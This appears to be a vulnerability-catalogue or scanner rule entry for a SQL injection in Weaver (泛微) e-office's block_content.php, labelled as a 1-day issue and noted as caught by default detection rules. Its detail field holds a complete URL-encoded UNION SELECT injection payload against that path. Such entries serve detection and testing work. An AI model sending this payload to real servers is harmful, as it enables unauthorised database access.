vendor = "泛微"
name = "泛微-eoffice block_content.php SQL注入"
type = "SQL注入"
version = "未知"
path = "/general/new_mytable/block_content.php"
detail = "/general/new_mytable/block_content.php?block_id=1%20UNION%20ALL%20SELECT%20CONCAT(0x71787a6a71,IFNULL(CAST(md5(123456)%20AS%20NCHAR),0x20),0x7171627671)--%20-"
fix = "缺省规则可检出"
date = "0704"
label = "1day"
verifier = "AdySec"
